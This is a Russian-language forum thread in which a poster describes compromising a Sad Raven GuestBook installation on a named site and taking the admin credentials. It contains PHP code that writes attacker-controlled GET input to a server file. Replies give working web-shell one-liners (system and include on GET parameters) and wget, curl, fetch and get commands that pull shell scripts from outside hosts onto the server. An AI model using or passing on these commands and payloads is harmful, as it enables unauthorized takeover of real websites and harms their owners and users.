Code: <? $open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+"); fwrite ($open,$_GET['fp']."\\n"); fclose($open); ?> Взломал Sad Raven GuestBook. Получил пароль и логин админа. Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с http://xop0k.h15.ru/adv/3.txt В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе. Передаю то, что надо записывать через GET переменную fp. Все бы было ок, да эта гостевуха экранирует слеши вот такие: Code: \ Как следствие нельзя записать в текстовой файл переменные в таком виде: Code: fwrite($fp, "\$text=\$_GET['fp']"); и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии ) Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru Абсолютные пути известны
пишешь `wget http://kobeluga.narod.ru/rst.php`; и у тебя загрузиться шелл в папку с гуестой =) по идее не должны `` экранироваться
Если у тебя есть возможность создать файл тогда пиши <?php system($_GET[cmd]);?> или <?php include($_GET[open]);?> В первом случае у тебя уже шелл во втором ты его можеш проинклудить и после выполнить то что сказал киборг если же это фря в гета там может и не быть тогда fetch -o shell.php http://freeshell.ru/myshell.txt курл и гет curl -o shell.php http://freeshell.ru/myshell.txt get -o shell.php http://freeshell.ru/myshell.txt
